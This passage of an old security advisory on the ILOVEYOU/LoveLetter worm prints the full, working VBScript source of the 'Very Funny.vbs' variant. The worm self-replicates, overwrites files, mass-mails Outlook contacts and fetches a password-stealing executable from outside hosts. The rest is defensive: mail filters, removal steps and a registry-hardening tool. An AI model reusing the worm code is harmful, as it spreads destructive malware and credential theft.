"Very Funny.vbs" (note the space) and not "VeryFunny.vbs", or
maybe it's a new variant.
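An added mail-gateway check (my own code, not from the advisory or from anyone quoted on this page) covering the lure messages described above, the variants list, Sean's .wsf point, and the outbound "Barok..." password report: it flags known lure subjects and attachment names, any attachment whose final extension Windows Script Host will run (including double extensions such as .TXT.vbs and .wsf), the worm's own first comment line, and the "#@~^" prefix of a Script Encoder blob. Subjects and file names are taken from this page; the messages are constructed with the standard email library.

```python
import email
from email import policy
from email.message import EmailMessage

# Extensions Windows Script Host (or mshta) executes on double-click. .wsf is
# included because the worm works just as well renamed to a Windows Script File.
SCRIPT_EXTENSIONS = {"vbs", "vbe", "js", "jse", "wsh", "wsf", "sct", "hta"}

# Lure subjects and attachment names listed on this page (original and variants).
KNOWN_SUBJECTS = {"iloveyou", "joke", "fw: joke", "fwd: joke",
                  "mothers day order confirmation",
                  "susitikim shi vakara kavos puodukui..."}
KNOWN_ATTACHMENTS = {"love-letter-for-you.txt.vbs", "very funny.vbs",
                     "veryfunny.vbs", "mothersday.vbs"}

# First comment line of the worm source reproduced on this page.
WORM_SOURCE_MARKER = b"rem barok -loveletter"
# Prefix Microsoft's Script Encoder puts on VBScript.Encode / JScript.Encode blobs.
ENCODED_SCRIPT_MARKER = b"#@~^"
# Subject of the report that WIN-BUGSFIX.EXE mails out (outbound direction).
EXFIL_SUBJECT_PREFIX = "barok... email.passwords.sender.trojan"


def classify_message(raw: bytes) -> list[str]:
    """Return the reasons a message should be quarantined (empty list = clean)."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    reasons = []
    subject = (msg["Subject"] or "").strip().lower()
    if subject in KNOWN_SUBJECTS:
        reasons.append(f"known lure subject {subject!r}")
    if subject.startswith(EXFIL_SUBJECT_PREFIX):
        reasons.append("outbound Barok password-stealer report")
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").strip()
        lname = name.lower()
        # Only the last extension matters to the shell: "x.TXT.vbs" runs as VBScript.
        ext = lname.rsplit(".", 1)[-1] if "." in lname else ""
        if ext in SCRIPT_EXTENSIONS:
            kind = "double-extension script" if lname.count(".") > 1 else "script"
            reasons.append(f"{kind} attachment {name!r}")
        if lname in KNOWN_ATTACHMENTS:
            reasons.append(f"known worm attachment name {name!r}")
        payload = part.get_payload(decode=True) or b""
        if WORM_SOURCE_MARKER in payload.lower():
            reasons.append(f"LoveLetter source marker in {name!r}")
        if ENCODED_SCRIPT_MARKER in payload:
            reasons.append(f"Script Encoder blob in {name!r}")
    return reasons


def build_sample(subject: str, body: str, filename: str, content: bytes) -> bytes:
    """Build a constructed test message (not a real capture) with one attachment."""
    m = EmailMessage()
    m["From"] = "someone@example.test"
    m["To"] = "victim@example.test"
    m["Subject"] = subject
    m.set_content(body)
    m.add_attachment(content, maintype="application", subtype="octet-stream",
                     filename=filename)
    return m.as_bytes()


if __name__ == "__main__":
    lure = build_sample("ILOVEYOU",
                        "kindly check the attached LOVELETTER coming from me.",
                        "LOVE-LETTER-FOR-YOU.TXT.vbs",
                        b"rem barok -loveletter(vbe) <i hate go to school>\r\n")
    for reason in classify_message(lure):
        print("quarantine:", reason)
```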
Very Funny.vbs:
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\Very Funny.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\Very Funny.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "fwd: Joke"
male.Body = vbcrlf&""
male.Attachments.Add(dirsystem&"\Very Funny.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\Very Funny.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\Very Funny.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
SOLUTION
Everyone should obtain and install the latest virus definition
files for their virus scanning software. Mail administrators
should filter out any email that has a .VBS attachment, or at
least any mail with a subject line of "ILOVEYOU".
Removing the virus is easy enough, but as another author said
("The Pope"), it is painful, and if you have useful VBScript, WSH
or other files of similar nature (listed below), you may have
already lost very valuable data. The steps are:
1. Remove the registry entries
HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
2. Remove *all* instances of the following files:
LOVE-LETTER-FOR-YOU.HTM
*.vbs
*.vbe
*.js
*.jse
*.css
*.wsh
*.sct
*.hta
Find hidden files of .mp2 and .mp3 extensions, and remove the
"hidden" bit. It is also a good idea to clear the "documents"
folder. Some AV vendors with solutions for this problem:
Aladdin: http://www.aks.com/home/csrt/valerts.asp
CA: http://www.ca.com/virusinfo/virusalert.htm
DrSolomon: http://www.drsolomons.com/home/extra.zip
F-Secure: http://www.f-secure.com/download-purchase/updates.html
Finjan: http://www.finjan.com/attack_release_detail.cfm?attack_release_id=34
McAfee: http://download.mcafee.com/extrafiles/love-4.zip
NAI: http://vil.nai.com/villib/dispVirus.asp?virus_k=98617
Proland: http://www.pspl.com/virus_info/worms/loveletter.htm
Sophos: http://www.sophos.com/virusinfo/analyses/vbsloveleta.html
Sophos: http://www.sophos.com/virusinfo/analyses/trojloveleta.html
Symantec: http://www.symantec.com/avcenter/venc/data/vbs.loveletter.a.html
TrendMicro: http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_LOVELETTER-O
Jose Nazario has been kind enough to put up a ruleset for
sendmail 8.9.x and 8.10.x that stops messages with "ILOVEYOU" in
the subject line. You can find it at:
http://biocserver.cwru.edu/~jose/iloveyouhack.txt
Matt Davis points out that you can modify John D. Hardin's
procmail filters to stop the worm. You can find them at
ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html
Sendmail.com has a rule to filter the worm based on the subject
header at http://www2.sendmail.com/loveletter. It works with
Sendmail 8.9 and newer.
If you are a Postfix user, you can stop the virus by doing the
following:
* Make sure your version of postfix supports the header_checks
directive.
* Add the line "header_checks = regexp:/etc/postfix/header_checks"
to your main.cf file.
* Create a /etc/postfix/header_checks file with a line of:
/^Subject:.*ILOVEYOU/ REJECT
or better yet
/Content.*\.vbs/ REJECT
* Execute "postfix reload".
For Exchange, Steve Willocks recommends Mail essentials for
Exchange/SMTP. It's a commercial product that you configure to
block messages based on attachment types or keyword matches,
among other features. You can find it at www.gfi.com/mesindex.htm
At least in some instances it seems tabs in the virus code have
been changed to spaces. That means the code looks the same but
its bytes are not, so some antivirus products may be fooled by
this. Trend Micro Interscan for mail servers, Solaris version,
seems to be affected. Thanks to Brett Dikeman for pointing this out.
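The Postfix header_checks rules above and the tab-for-space rewrite that fools exact signature matching, as an added Python example that is not part of the advisory or of any vendor's tool: it applies the advisory's two patterns to the headers of every MIME part and fingerprints script text only after whitespace normalisation. The sample messages and script fragment are constructed; the "fwd: Joke" variant uses the Subject and attachment name seen in the worm's spreadtoemail routine above.

```python
import email
import hashlib
import re
from email import policy

# Rules copied from the advisory's Postfix header_checks lines. Postfix
# tests each logical header line; MIME-aware releases also apply them to
# the headers of every MIME part by default (mime_header_checks).
HEADER_RULES = [
    (re.compile(r"^Subject:.*ILOVEYOU"), "subject"),
    (re.compile(r"Content.*\.vbs"), "vbs-attachment"),
]

def check_headers(raw_message, rules=HEADER_RULES):
    """Return the label of the first rule that fires, or None to accept."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    for part in msg.walk():              # root headers, then each MIME part
        for name, value in part.items():
            line = f"{name}: {value}"    # the "Name: value" form Postfix sees
            for pattern, label in rules:
                if pattern.search(line):
                    return label
    return None

def normalize_script(text):
    """Collapse tab/space runs and trim line ends, so a copy of the script
    rewritten with spaces instead of tabs normalises to the same text."""
    return "\n".join(re.sub(r"[ \t]+", " ", ln).strip()
                     for ln in text.splitlines())

def script_fingerprint(text):
    return hashlib.sha256(normalize_script(text).encode()).hexdigest()

# Constructed sample in the layout of the worm's original message.
LOVELETTER = """\
Subject: ILOVEYOU
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: application/octet-stream; name="LOVE-LETTER-FOR-YOU.TXT.vbs"

(attachment omitted)
--b1--
"""
# Constructed variant with the Subject and attachment name spreadtoemail uses.
JOKE = LOVELETTER.replace("ILOVEYOU", "fwd: Joke").replace(
    "LOVE-LETTER-FOR-YOU.TXT.vbs", "Very Funny.vbs")
# Constructed script fragment, indented with spaces and then with tabs.
SPACED = 'if (regad="") then\n    set male=out.CreateItem(0)\nend if\n'
TABBED = SPACED.replace("    ", "\t")
```

The subject-only rule accepts the "fwd: Joke" variant, while the attachment rule rejects both messages; the fingerprint of the tabbed and spaced fragments is identical even though the raw bytes differ.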
Anyway, while everyone has been scrambling east and west, north
and south trying to find the answer to these VBS viruses, the
answer is not eMail filtering, it's not better firewalls, or
failing members of the FBI community. It is a file called
WScript.Exe. A batch (.BAT) file with these two lines will deal
with this problem:
ren %SystemRoot%\system32\wscript.exe wscript.sav
ren c:\windows\wscript.exe wscript.sav
If you get rid of this engine, no Visual Basic Scripts can be run
any more. This will only do 50% of the job. There is a 2nd
version of the scripting host with the name cscript.exe. This one
normally deals with commandline scripts (that is, scripts which
don't use their own window but send their output to a shell).
CSCRIPT.EXE is also attached to .vbs, .vbe, .jse etc. file types
through the registry.
If you want to get rid of wscript.exe under win2k, just delete
%systemroot%\system32\dllcache\wscript.exe first, and then
%systemroot%\system32\dllcache\wscript.exe. If you then simply
refuse to insert the Win2k CD when SFP asks for it, that file
will be marked as "not restored" somewhere within the bowels of
the registry, and SFP will (hopefully) continue to shut up about
it. This will also be visible in the Event Log.
The Cerberus Security Team have written a tool that will prevent
PC users from being infected by such viral worms as the now
infamous "I Love You" and its many variants and any others that
are still only a gleam in the eye of the budding virus writer.
These rely on basic default configurations of a standard
Microsoft box to be able to spread - and also a little help from
the user by actually opening the attachment! As many will be
aware 99% of files on a Windows machine have a three letter
extension. This extension tells Windows Explorer how to deal with
each file. For example, if you double click on a file with the
.txt extension Explorer will look in the Registry to see what
application to use to open it - notepad.exe in this case.
As far as the "I Love You" worm is concerned it has a .vbs
extension and so, when opened by the person it has been sent to,
Windows looks in the Registry to see what application it should
use to deal with the file - in this case wscript.exe. wscript.exe
is a script interpreter and when passed the file it executes the
code it finds there - very much like what command.com or cmd.exe
does for batch (.bat) files. The tool the Cerberus Security Team
has written goes through the registry and removes these
application / file extension associations for VBS, VBE, WSF, WSH,
JS and JSE, and any viruses or worms that rely on these
associations will therefore fail. These are all "dangerous"
mappings and to be perfectly frank most computer users never use
the functionality provided by these.
They provide the source code at the end of this mail and also
make the binary version available from their website:
http://www.cerberus-infosec.co.uk/vf.exe
It has been tested on Windows 98, Windows NT 4 and Windows 2000.
Though not yet tested on Windows 95 it should still work. Source:
////////////////////////////////////////////////////////////////////////////////////
//
// compile with eg Visual C++ link with advapi32.lib
//
// Cerberus Information Security, Ltd
//
// 8th May 2000
//
////////////////////////////////////////////////////////////////////////////////////
#include <windows.h>
#include <winreg.h>
#include <stdio.h>
#include <string.h>

#define SUCCESS 1
#define FAILURE 0

/* Registry root whose file-type keys are modified: the local
   HKEY_CLASSES_ROOT by default, or a remote machine's once
   ConnectToRemoteRegistry() has succeeded. */
HKEY KeyToChange = HKEY_CLASSES_ROOT;

int  ChangeFileAssociations(void);
int  ConnectToRemoteRegistry(char *);
LONG DoSetAKey(HKEY, char *, char *);

int main(int argc, char *argv[])
{
    DWORD chk = 0;
    char hostname[260] = "\\\\";
    char *errors = "There were errors changing the file associations.\n";
    char *noerrors = "VBS,VBE,WSF,WSH,JS and JSE file associations have been changed.\n";

    printf("\nCerberus Security Team\nhttp://www.cerberus-infosec.co.uk/\n8th May 2000\n\n");

    if (argc == 1)
    {
        /* No argument: change the associations on the local machine. */
        chk = ChangeFileAssociations();
        if (chk)
        {
            printf(noerrors);
            return SUCCESS;
        }
        else
        {
            printf(errors);
            return FAILURE;
        }
    }
    else
    {
        /* stricmp is the Microsoft C runtime's case-insensitive compare. */
        if ((stricmp(argv[1], "/?") == 0) ||
            (stricmp(argv[1], "-?") == 0) ||
            (stricmp(argv[1], "/h") == 0) ||
            (stricmp(argv[1], "-h") == 0) ||
            (stricmp(argv[1], "?") == 0) ||
            (stricmp(argv[1], "help") == 0) ||
            (stricmp(argv[1], "/help") == 0))
        {
            return 0;
        }
        else
        {
            /* Any other argument is a machine name: build "\\host" and
               work on that machine's registry instead of the local one. */
            strncat(hostname, argv[1], 250);
            chk = ConnectToRemoteRegistry(hostname);
            if (!chk)
            {
                printf("Error connecting to %s\n", hostname);
                return FAILURE;
            }
            else
            {
                chk = ChangeFileAssociations();
                if (chk)
                {
                    printf(noerrors);
                    return SUCCESS;
                }
                else
                {
                    printf(errors);
                    return FAILURE;
                }
            }
        }
    }
}

int ConnectToRemoteRegistry(char *host)
{
    HKEY hkcr = HKEY_CLASSES_ROOT;
    LONG connect;

    /* On success KeyToChange becomes a handle to the remote HKCR. */
    connect = RegConnectRegistry(host, hkcr, &KeyToChange);
    if (connect == ERROR_SUCCESS)
    {
        return SUCCESS;
    }
    else
    {
        return FAILURE;
    }
}

/* Shell\Open\Command is what Explorer runs on a double-click (wscript.exe)
   and Shell\Open2\Command is the "Open with Command Prompt" entry
   (cscript.exe); both are overwritten for each script file type. */
static char *AssociationKeys[] =
{
    "VBSFile\\Shell\\Open\\Command", "VBSFile\\Shell\\Open2\\Command",
    "WSHFile\\Shell\\Open\\Command", "WSHFile\\Shell\\Open2\\Command",
    "VBEFile\\Shell\\Open\\Command", "VBEFile\\Shell\\Open2\\Command",
    "WSFFile\\Shell\\Open\\Command", "WSFFile\\Shell\\Open2\\Command",
    "JSEFile\\Shell\\Open\\Command", "JSEFile\\Shell\\Open2\\Command",
    "JSFile\\Shell\\Open\\Command",  "JSFile\\Shell\\Open2\\Command",
};

int ChangeFileAssociations(void)
{
    LONG chk = 0;
    size_t i;

    for (i = 0; i < sizeof(AssociationKeys) / sizeof(AssociationKeys[0]); i++)
    {
        chk = DoSetAKey(KeyToChange, AssociationKeys[i], "Foobar");
        /* A missing key only means that file type is not registered on
           this machine; any other failure aborts. */
        if (chk != SUCCESS && chk != ERROR_FILE_NOT_FOUND)
        {
            printf("Error %ld\n", chk);
            return FAILURE;
        }
    }
    return SUCCESS;
}

LONG DoSetAKey(HKEY root, char *key, char *set)
{
    HKEY hResult;
    LONG nResult;

    nResult = RegOpenKeyEx(root, key, 0, KEY_WRITE, &hResult);
    if (nResult != ERROR_SUCCESS)
    {
        if (nResult != ERROR_FILE_NOT_FOUND)
        {
            return FAILURE;
        }
        else
        {
            return ERROR_FILE_NOT_FOUND;
        }
    }
    /* Replace the key's (Default) value, the command line Explorer would
       run for this file type, with a harmless string so the script
       interpreter is never launched. */
    nResult = RegSetValueEx(hResult, NULL, 0, REG_MULTI_SZ,
                            (CONST BYTE *)set, (DWORD)strlen(set) + 1);
    if (nResult != ERROR_SUCCESS)
    {
        RegCloseKey(hResult);
        return FAILURE;
    }
    else
    {
        printf("Success\n");
        RegCloseKey(hResult);
        return SUCCESS;
    }
}
Microsoft released the binaries for their Email Security Update.
Available now is a version for Outlook 98;
http://www.officeupdate.com/downloadDetails/Out98sec.htm
and Outlook 2000 SR-1:
http://www.officeupdate.com/2000/downloaddetails/Out2ksec.htm
Nothing is currently available to alter the way Outlook Express
works. These updates are strictly for Outlook 98/2000 SR-1. Note
that after installing the Outlook 98 Security Update on some test
workstations, you will find that it works as advertised on NT and
WIN 98 machines, but on the Win 95 machines, you can no longer
route documents from Word 97. When you try to route a document in
Word 97 via file-sendto-routing recipient, you will get the error
"YOUR MAIL SYSTEM DOES NOT SUPPORT CERTAIN SERVICES NEEDED FOR
DOCUMENT ROUTING".
Reliable Software Technologies released a new program designed to
prevent e-mail macro viruses from spreading. It can be used along
with or instead of the Microsoft supplied e-mail protection patch.
JustBeFriends works with all versions of Outlook and Outlook
Express, and is substantially simpler than the Microsoft patch.
For full details, see
http://www.rstcorp.com/news/jbf.html